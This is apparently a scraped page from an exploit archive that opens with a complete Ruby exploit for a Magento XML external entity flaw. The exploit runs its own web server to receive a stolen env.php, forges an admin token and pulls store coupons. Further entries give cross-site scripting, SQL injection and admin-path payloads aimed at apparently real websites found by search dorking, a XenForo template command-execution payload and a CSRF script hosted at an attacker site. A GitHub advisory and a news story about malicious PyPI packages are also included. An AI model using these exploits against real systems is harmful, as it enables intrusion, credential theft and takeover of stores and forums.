Adobe Commerce and Magento Open Source are affected by an XML injection vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction. Versions Affected include Adobe Commerce and Magento Open Source 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8, and earlier. This exploit uses the arbitrary file reading aspect of the issue to impersonate a user.

#!/usr/bin/env ruby -W0

require 'bundler'  
Bundler.require(:default)

DEBUG = false  
USE_PROXY = false  
PROXY_ADDR = '127.0.0.1'  
PROXY_PORT = 8080

def debug(msg)  
  puts msg.inspect if DEBUG  
end

def rand_text(length = 8)  
  # random string generator  
  o = [('a'..'z'), ('A'..'Z')].map(&:to_a).flatten  
  (0...length).map { o[rand(o.length)] }.join  
end

def dtd_param_name  
  @dtd_param_name ||= rand_text()  
end

def ent_eval  
  @ent_eval ||= rand_text()  
end

def leak_param_name  
  @leak_param_name ||= rand_text()  
end

def remote_addr  
  @remote_addr ||= "http://#{@srv_host.host}:#{@srv_host.port}"  
end

def http  
  @http ||= begin  
    http = if USE_PROXY  
             Net::HTTP.new(@target_uri.host, @target_uri.port, PROXY_ADDR, PROXY_PORT)  
           else  
             Net::HTTP.new(@target_uri.host, @target_uri.port)  
           end

    if @target_uri.port == 443 || @target_uri.to_s.match(%r{http(s).*})  
      http.use_ssl = true  
      http.verify_mode = OpenSSL::SSL::VERIFY_NONE  
    end

    http.set_debug_output($stderr) if DEBUG  
    http  
  end  
end

def make_xxe_dtd  
  filter_path = 'php://filter/convert.base64-encode/resource=../app/etc/env.php'  
  ent_file = rand_text()  
  %(  
    <!ENTITY % #{ent_file} SYSTEM "#{filter_path}">  
    <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM '#{remote_addr}/?#{leak_param_name}=%#{ent_file};'>">  
  )  
end

def xxe_xml_data()  
  param_entity_name = rand_text()

  xml = "<?xml version='1.0' ?>"  
  xml += "<!DOCTYPE #{rand_text()}"  
  xml += '['  
  xml += "  <!ELEMENT #{rand_text()} ANY >"  
  xml += "    <!ENTITY % #{param_entity_name} SYSTEM '#{remote_addr}/#{rand_text}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; "  
  xml += ']'  
  xml += "> <r>&#{ent_eval};</r>"

  xml  
end

LIBXML_NOENT = 2  
LIBXML_PARSEHUGE = 524288

def xxe_request()  
  debug('Sending XXE request')

  signature = rand_text().capitalize

  post_data = {  
    "address": {  
      "#{signature}": rand_text(),  
      "totalsCollector": {  
        "collectorList": {  
          "totalCollector": {  
            "\u0073\u006F\u0075\u0072\u0063\u0065\u0044\u0061\u0074\u0061": {  
              "data": xxe_xml_data(),  
              "options": LIBXML_NOENT|LIBXML_PARSEHUGE  
            }  
          }  
        }  
      }  
    }  
  }.to_json  
  req = Net::HTTP::Post.new('/rest/V1/guest-carts/1/estimate-shipping-methods')  
  req.body = post_data  
  req.content_type = 'application/json'  
  # req.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)'  
  res = http.request(req)

  raise RuntimeError, "Server returned unexpected response" unless res&.code == '400'

  body = JSON.parse(res.body)

  raise RuntimeError, "Server returned unexpected response" unless body['parameters']['fieldName'] == signature

end

TARGET_USER_ID = 1

USER_TYPE_INTEGRATION = 1;  
USER_TYPE_ADMIN = 2;  
USER_TYPE_CUSTOMER = 3;  
USER_TYPE_GUEST = 4;

def jwt_encode(key, algorithm = 'HS256')  
  def pad_key(key, total_length, pad_char)  
    left_padding = (total_length - key.length) / 2  
    right_padding = total_length - key.length - left_padding  
    pad_char * left_padding + key + pad_char * right_padding  
  end  
  header = {  
    kid: "1",  
    alg: "HS256"  
  }

  payload = {  
    uid: TARGET_USER_ID,    
    utypid: USER_TYPE_ADMIN,  
    iat: Time.now.to_i,  # Token issue time',  
    exp: Time.now.to_i + 10 * 24 * 60 * 60,  # Token expiration time  
  }

  def base64_url_encode(str)  
    Base64.urlsafe_encode64(str).tr('=', '')  
  end

  padded_key = pad_key(key, 2048, '&')

  encoded_header = base64_url_encode(header.to_json)  
  encoded_payload = base64_url_encode(payload.to_json)

  # Create the signature  
  data = "#{encoded_header}.#{encoded_payload}"  
  signature = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), padded_key, data)  
  encoded_signature = base64_url_encode(signature)

  # Combine the header, payload, and signature to form the JWT  
  "#{encoded_header}.#{encoded_payload}.#{encoded_signature}"

end

def exploit()  
  begin  
    puts "Starting web server..."  
    body = make_xxe_dtd()  
    file_content = nil  
    file_content_reader, file_content_writer = IO.pipe  
    WEBrick::HTTPRequest.const_set("MAX_URI_LENGTH", 10240)  
    wbserver_options = {  
      :BindAddress => '0.0.0.0',  
      :Port => @srv_host.port,  
      :Logger => WEBrick::Log.new($stderr, WEBrick::Log::DEBUG),  
      :AccessLog => [],  
      # :RequestTimeout => 300,       # Increase request timeout  
      # :RequestMaxUriLength => 100240 # Increase max URI length  
    }  
    wbserver_options[:Logger] = WEBrick::Log.new("/dev/null") unless DEBUG

    pid = Process.fork do  
      file_content_reader.close

      server = WEBrick::HTTPServer.new(wbserver_options)  
      server.mount_proc '/' do |req, res|  
        if req.path =~ /\.dtd$/  
          res.body = body  
        elsif req.query_string.match(/#{leak_param_name}=(.*)/)  
          file_content = Base64.decode64(Regexp.last_match(1))  
          # puts "Received leaked file content:\n#{file_content}"  
          file_content_writer.puts file_content

        else  
          res.body = 'OK'  
        end  
      end

      trap("INT") do  
        server.shutdown  
        file_content_writer.close  
      end

      server.start  
    end

    sleep(1)  
    xxe_request()  
    file_content_writer.close

    begin  
      # Set a timeout for reading from the pipe  
      Timeout.timeout(5) do  # 5 seconds timeout, adjust as necessary  
        file_content = file_content_reader.read_nonblock(10000)  # Adjust the size as necessary  
      end  
    rescue Timeout::Error  
      puts "Reading from pipe timed out."  
    rescue EOFError  
      puts "End of file reached."  
    ensure  
      file_content_reader.close  
    end

    # Use file_content as needed here  
    if file_content  
      # puts "Successfully read file content:\n#{file_content}"  
      key = file_content.match(/'key' => '(.*)'/)[1]  
      if key  
        debug "Found key: #{key}"  
        jwt = jwt_encode(key)  
        puts "Generated JWT: #{jwt}"  
        puts("Sending request with JWT to coupons endpoint")  
        # Perform authenticated request to a admin endpoint  
        res = http.request(Net::HTTP::Get.new('/rest/default/V1/coupons/search?searchCriteria=', {'Authorization' => "Bearer #{jwt}"}))  
        raise RuntimeError, "Server returned unexpected response" unless res&.code == '200'  
        puts "Available coupons:"  
        puts JSON.pretty_generate(JSON.parse(res.body))  
      else  
        puts "Failed to extract key from file content."  
      end  
    else  
      puts "Failed to read file content or content is empty."  
    end

    puts "Exploit completed"

  rescue RuntimeError => e  
    puts "#{e.class} - #{e.message}"  
  ensure  
    if pid  
      Process.kill("INT", pid)  
      Process.wait(pid)  
    end  
  end  
end

if __FILE__ == $0  
  @target_uri = URI.parse(ARGV[0])  
  @srv_host = URI.parse(ARGV[1])

  exploit()  
end

Adobe Commerce / Magento Open Source XML Injection / User Impersonation

Xhibiter NFT Marketplace version 1.10.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Xhibiter NFT Marketplace 1.10.2 XSS Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /search.php?id=1'%22()%26%25<acx><ScRiPt%20>prompt(915136)</ScRiPt>[+] https://www/127.0.0.1/gatesea.io/search.php?id=1'"()%26%25<acx><ScRiPt >prompt(915136)</ScRiPt>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Xhibiter NFT Marketplace 1.10.2 Cross Site Scripting

eStore CMS version 2.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : eStore CMS v2.0 Sql injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://www.2iraq.com/                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : "CMS.php?CMS_P=" or "News_Details.php?ID="<===== inject here[+] https://www/127.0.0.1/uruk.edu.iq/News_Details.php?ID=467Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

eStore CMS 2.0 SQL Injection

Clenix version 1.0 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Clenix v1.0 IDOR Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.1 (64 bits)                                                   || # Vendor    : https://www.radiustheme.com/                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /admin/main.php[+] https://www/127.0.0.1/otabucert.co.uk/admin/main.php[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Clenix 1.0 Insecure Direct Object Reference

Candy Redis version 2.1.2 appears to suffer from an administrative page disclosure issue.

====================================================================================================================================  
| # Title     : Candy Redis V2.1.2 HTML Form in redirect page Vulnerability                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   |  
| # Vendor    : https://bacadigital.com/pasti-bisa-panduan-ujian-cbt-untuk-pengguna/                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

Candy Redis 2.1.2 Admin Page Disclosure

Agop CMS version 1.0 suffers from an insecure direct object reference vulnerability.

**Agop CMS 1.0 Insecure Direct Object Reference**

Posted Jul 22, 2024

Authored by indoushka

Agop CMS version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 1ed22de09e417dcaed8d9f03d8d62abd6b70fc4587552e70a4bdbce253d3011b

Download | Favorite | View

**Agop CMS 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Agop CMS v1.0 IDOR Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://gico.io/agop/demos/                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/managePages.php[+] https://www/127.0.0.1/tiktrades.com/admin/managePages.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,061)
*   Arbitrary (16,823)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,776)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,985)
*   Encryption (2,389)
*   Exploit (53,050)
*   File Inclusion (4,256)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,875)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,161)
*   Local (14,770)
*   Magazine (586)
*   Overflow (13,147)
*   Perl (1,435)
*   PHP (5,219)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,602)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,021)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,584)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,893)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,234)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (376)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,456)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,351)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,673)
*   UNIX (9,429)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Agop CMS 1.0 Insecure Direct Object Reference

XenForo versions 2.2.15 and below suffer from a remote code execution vulnerability in the Template system.

    -----------------------------------------------------------------------XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability-----------------------------------------------------------------------[-] Software Link:https://xenforo.com[-] Affected Versions:Version 2.2.15 and prior versions.[-] Vulnerability Description:XenForo implements a template system which gives complete control overthe layout of XenForo pages. Through these templates, it might bepossible to call certain "callback methods", however there is a sortof "sandbox" which allows to solely call read-only methods: a methodis to be considered read-only when it begins with one of the allowedprefixes, such as "get" or "filter". Malicious users might be able tobypass this "sandbox" by abusing the getRepository() method from theXF\Mvc\Entity\Manager class in order to get an instance object of theXF\Util\Arr class, and from there they can abuse its filterRecursive()static method in order to execute arbitrary callbacks or functions(internally, this method calls the array_filter() PHP function with anattacker-controlled "callback" parameter). As such, this can beexploited to e.g. execute arbitrary OS commands by using a payloadlike the following within a template, which will try to execute thepassthru() PHP function passing to it the string "whoami" as argument,potentially resulting in the execution of the "whoami" command on theweb server:{{ $xf.app.em.getRepository('XF\Util\Arr').filterRecursive(['whoami'],'passthru')}}Successful exploitation of this vulnerability requires an account withpermissions to administer styles or widgets.[-] Solution:Update to a fixed version or apply the vendor patches.[-] Disclosure Timeline:[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure[05/06/2024] - Vendor released patches and fixed versions[14/06/2024] - CVE identifier requested[16/06/2024] - CVE identifier assigned[16/07/2024] - Coordinated public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org) hasassigned the name CVE-2024-38458 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Other References:https://xenforo.com/community/threads/222133https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/[-] Original Advisory:http://karmainsecurity.com/KIS-2024-06

Xenforo 2.2.15 Remote Code Execution

XenForo versions 2.2.15 and below suffer from a cross site request forgery vulnerability in Widget::actionSave.

-------------------------------------------------------------------------------  
XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability  
-------------------------------------------------------------------------------

[-] Software Link:

https://xenforo.com

[-] Affected Versions:

Version 2.2.15 and prior versions.

[-] Vulnerability Description:

The XF\Admin\Controller\Widget::actionSave() method, defined into the  
/src/XF/Admin/Controller/Widget.php script, does not check whether the  
current HTTP request is a POST or a GET before saving a widget.  
XenForo does perform anti-CSRF checks for POST requests only, as such  
this method can be abused in a Cross-Site Request Forgery (CSRF)  
attack to create/modify arbitrary XenForo widgets via GET requests,  
and this can also be exploited in tandem with KIS-2024-06 to perform  
CSRF-based Remote Code Execution (RCE) attacks.

Furthermore, XenForo implements a BB code system, as such this  
vulnerability could also be exploited through "Stored CSRF" attacks by  
abusing the [img] BB code tag, creating a thread or a private message  
(to be sent to the victim user) like the following:

[img]https://attacker.website/exploit.php[/img]

Where the exploit.php script hosted on the attacker-controlled website  
could be something like this:

<?php

$url = "https://victim.website/xenforo/";

header("Location:  
{$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}");

?>

Successful exploitation of this vulnerability requires a victim user  
with permissions to administer styles or widgets to be currently  
logged into the Admin Control Panel.

[-] Solution:

Update to a fixed version or apply the vendor patches.

[-] Disclosure Timeline:

[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure  
[05/06/2024] - Vendor released patches and fixed versions  
[14/06/2024] - CVE identifier requested  
[16/06/2024] - CVE identifier assigned  
[16/07/2024] - Coordinated public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has  
assigned the name CVE-2024-38457 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Other References:

https://xenforo.com/community/threads/222133  
https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/

[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-05

XenForo 2.2.15 Cross Site Request Forgery

### Summary

In `torrentpier/library/includes/functions.php`, `get_tracks()` uses the unsafe native PHP serialization format to deserialize user-controlled cookies:

https://github.com/torrentpier/torrentpier/blob/84f6c9f4a081d9ffff4c233098758280304bf50f/library/includes/functions.php#L41-L60

### PoC

One can use [`phpggc`](https://github.com/ambionics/phpggc/) and the chain `Guzzle/FW1` to write PHP code to an arbitrary file, and execute commands on the system. For instance, the cookie `bb_t` will be deserialized when browsing to `viewforum.php`.


**TorrentPier Deserialization of Untrusted Data vulnerability**

Critical severity GitHub Reviewed Published Jul 13, 2024 in torrentpier/torrentpier • Updated Jul 15, 2024

GHSA-fg86-4c2r-7wxw: TorrentPier Deserialization of Untrusted Data vulnerability

A malicious Telegram bot is the key to a veritable flourishing garden of nefarious cybercriminal activity, which was discovered via a series of Python packages.

Source: Picturebank via Alamy Stock Photo

A sprawling criminal network has emerged in Iraq, linked to a Telegram bot that dates back to 2022 and contains more than 90,000 messages, mostly in Arabic.

According to researchers at Checkmarx, the bot is the key to a larger, sophisticated cybercriminal ecosystem, including a thriving underground marketplace offering social media manipulation services and financial theft tools, and a suite of malicious PyPI packages that exfiltrate user data.

**Malicious PyPI Packages for Data Theft**

A series of malicious, Arabic-language Python packages recently surfaced on the Python code repository PyPI according to Checkmarx, uploaded by a user named "dsfsdfds." Upon further examination, the researchers found them to contain a malicious script that was pilfering sensitive user data out to a Telegram bot chat.

"The malicious script … begins by scanning the user's file system, focusing on two specific locations: the root folder and the DCIM folder," according to the report, released today. "During this scanning process, the script searches for files with extensions such as .py, .php, and .zip files, as well as photos with .png, .jpg, and .jpeg extensions."

The packages also contained a hardcoded Telegram ID and token, which Checkmarx researchers used to gain direct access to the attacker's Telegram bot, where they discovered "a significant history of activity, with records dating back to at least 2022, long before the malicious packages were released on PyPI."

Ultimately, the 90,000 messages pointed to an origin in Iraq, with ties with many other bots to boot. In all, it's clear that Iraq is home to a heretofore unknown, thriving cybercriminal enterprise with a raft of illicit services on offer.

"The discovery of the malicious Python packages on PyPI and the subsequent investigation into the Telegram bot have shed light on a sophisticated and widespread cybercriminal operation," the report concluded. "What initially appeared to be an isolated incident of malicious packages turned out to be just the tip of the iceberg, revealing a well-established criminal ecosystem based in Iraq."

The discovery underscores the role that open source software continues to play when it comes to providing an attack vector for compromising enterprise information, the researchers noted, adding that they plan to release further details on the Iraq underground discovery in the coming months.

"As the fight against malicious actors in the open-source ecosystem persists, collaboration and information sharing among the security community will be critical in identifying and thwarting these attacks," they said. "Through collective effort and proactive measures, we can work towards a safer and more secure open-source ecosystem for all."

**About the Author(s)**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

Tag

#php